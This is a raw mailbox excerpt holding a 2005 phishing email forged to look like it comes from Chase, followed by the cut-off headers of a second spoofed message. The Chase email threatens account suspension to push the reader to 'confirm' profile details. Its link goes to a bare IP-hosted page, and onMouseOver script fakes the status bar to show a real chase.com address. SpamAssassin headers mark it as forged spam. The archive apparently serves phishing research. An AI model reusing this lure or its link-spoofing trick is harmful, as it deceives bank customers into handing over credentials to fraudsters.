From: "service@chase.com" <service@chase.com>
Reply-To: "service@chase.com" <service@chase.com>
To: jose@monkey.org
Subject: IMPORTANT : CHANGE YOUR PASSWORD
Date: Mon, 14 Nov 2005 18:14:33 +0100
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--10454051498866333427"
X-Priority: 1
X-MSMail-Priority: High
X-Spam-Flag: YES
X-Spam-Checker-Version: SpamAssassin 3.0.2 (2004-11-16)
X-Spam-Level: ********************
X-Spam-Status: Yes, score=20.7 required=5.0 tests=FORGED_MUA_OUTLOOK,
	FORGED_OUTLOOK_HTML,FORGED_OUTLOOK_TAGS,HTML_IMAGE_ONLY_24,
	HTML_MESSAGE,MIME_BOUND_DD_DIGITS,MIME_HTML_ONLY,MIME_HTML_ONLY_MULTI,
	MISSING_MIMEOLE,MPART_ALT_DIFF,MSGID_SPAM_CAPS,NORMAL_HTTP_TO_IP,
	RCVD_IN_BL_SPAMCOP_NET,RCVD_IN_XBL,SUBJ_ALL_CAPS autolearn=spam 
	version=3.0.2
X-Spam-Report: 
	*  4.1 MIME_BOUND_DD_DIGITS Spam tool pattern in MIME boundary
	*  3.8 MSGID_SPAM_CAPS Spam tool Message-Id: (caps variant)
	*  0.7 SUBJ_ALL_CAPS Subject is all capitals
	*  0.0 NORMAL_HTTP_TO_IP URI: Uses a dotted-decimal IP address in URL
	*  0.5 HTML_IMAGE_ONLY_24 BODY: HTML: images with 2000-2400 bytes of words
	*  0.0 HTML_MESSAGE BODY: HTML included in message
	*  0.1 MPART_ALT_DIFF BODY: HTML and text parts are different
	*  0.2 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
	*  1.2 RCVD_IN_BL_SPAMCOP_NET RBL: Received via a relay in bl.spamcop.net
	*      [Blocked - see <http://www.spamcop.net/bl.shtml?198.22.65.157>]
	*  3.1 RCVD_IN_XBL RBL: Received via a relay in Spamhaus XBL
	*      [198.22.65.157 listed in sbl-xbl.spamhaus.org]
	*  0.6 FORGED_OUTLOOK_HTML Outlook can't send HTML message only
	*  0.1 FORGED_OUTLOOK_TAGS Outlook can't send HTML in this format
	*  2.4 MIME_HTML_ONLY_MULTI Multipart message only has text/html MIME parts
	*  0.0 MISSING_MIMEOLE Message has X-MSMail-Priority, but no X-MimeOLE
	*  3.9 FORGED_MUA_OUTLOOK Forged mail pretending to be from MS Outlook
Status: O
X-Status: 
X-Keywords:                  
X-UID: 449

----10454051498866333427
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable



<html>
<p>
  <A target=3D"_blank"
href=3D"http://210.98.146.139/.profile/index.php?prospect_nfpb=3Dtrueportl=
et_change_1_actionOverrideFchaseonlineFchangeFverifyDetails_windowLabel_po=
rtlet_change_pageLabel_page_change"    ><IMG
src=3D"https://chaseonline.chase.com/content/ecpweb/sso/image/chaseNew.gif=
"    border=3D0></A></p>
  <BR>
We recently have determined that different computers have logged onto your=
 Online Banking account, and multiple
password failures
were present before the logons. We now need you to re-confirm your profile=
 information to us. If this is not completed
by <strong>November 18, 2005</strong>, we will be forced to suspend your 
account indefinitely, as it may have been
used for fraudulent purposes. We thank you for your cooperation in this ma=
nner.</FONT>
<p>To confirm your Online Profile records click here: 
<p><br>
  
  <a
href=3D"http://210.98.146.139/.profile/index.php?prospect_nfpb=3Dtrueportl=
et_change_1_actionOverrideFchaseonlineFchangeFverifyDetails_windowLabel_po=
rtlet_change_pageLabel_page_change"
onMouseOver=3D"window.status=3D'https://chaseonline.chase.com/colappmgr/co=
lportal/prospect?_nfpb=3Dtrue&_pageLabel=3Dpage_logonform';return true;"
    onMouseOut=3D"window.status=3D' ';return
true;">https://chaseonline.chase.com/colappmgr/colportal/prospect?_nfpb=3D=
true&_pageLabel=3Dpage_logonform</a>
      <br>
      <br>
<p><font size=3D"2" face=3D"Arial, Helvetica, sans-serif"></font><font
color=3D"#000000" size=3D"2" face=3D"Arial, Helvetica, sans-serif"><BR>
Thank you for your patience in this matter.</font><br>
  <br>
</p>
<p><font color=3D"#000000" size=3D"2" face=3D"Arial, Helvetica, sans-serif=
"> JPMorgan Chase &amp; Co. Customer Service</font><br>
<font color=3D"#000000" size=3D"2" face=3D"Arial, Helvetica, sans-serif"><=
/font></p>
<p><font size=3D"2" face=3D"Arial, Helvetica, sans-serif"><font color=3D"#=
999999" size=3D"1">Please do not reply to this e-mail
as this is only a notification. Mail sent to this address cannot be answer=
ed. </font></font></p>
<p><font color=3D"#000000" size=3D"1" face=3D"Arial, Helvetica, sans-serif=
"><font color=3D"black"><span style=3D"color:
black;"></font>&copy; 2005 JPMorgan Chase &amp; Co.<br>
</html>










----10454051498866333427--

From service@cuna.org  Mon Nov 14 17:22:59 2005
Return-Path: <service@cuna.org>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail1.monkey.org (mail1.monkey.org [65.23.81.153])
	by naughty.monkey.org (Postfix) with ESMTP id CDDDB536F02
	for <jose@login.monkey.org>; Mon, 14 Nov 2005 17:22:58 -0500 (EST)
Received: from mail1.monkey.org (localhost.monkey.org [127.0.0.1])
	by mail1.monkey.org (Postfix) with ESMTP id 7F1D56CCED8
	for <jose@monkey.org>; Mon, 14 Nov 2005 17:22:52 -0500 (EST)
Received: from lujan.uninet.edu (bio.hgy.es [193.146.180.21])
	by mail1.monkey.org (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 14 Nov 2005 17:22:52 -0500 (EST)
Received: by lujan.uninet.edu (Postfix)
	id 01C4E1BC43; Mon, 14 Nov 2005 23:22:56 +0100 (CET)
Delivered-To: josu@uninet.edu
Received: from localhost (unknown [127.0.0.1])
	by lujan.uninet.edu (Postfix) with ESMTP
	id 6C6B01BC17; Mon, 14 Nov 2005 22:22:55 +0000 (UTC)
Received: from lujan.uninet.edu ([193.146.180.21])
	by localhost (lujan [193.146.180.21]) (amavisd-new, port 10024)
	with ESMTP id 14192-08; Mon, 14 Nov 2005 23:22:35 +0100 (CET)
Received: from 209.190.19.50 (unknown [209.190.19.50])
	by lujan.uninet.edu (Postfix) with SMTP
	id 250E51BB39; Mon, 14 Nov 2005 23:21:58 +0100 (CET)
Received: from 96.4.230.12 by ; Tue, 15 Nov 2005 00:13:57 +0200
Message-ID: <TFRRLTRPVWVBCQJFKYNZCY@earthlink.net>
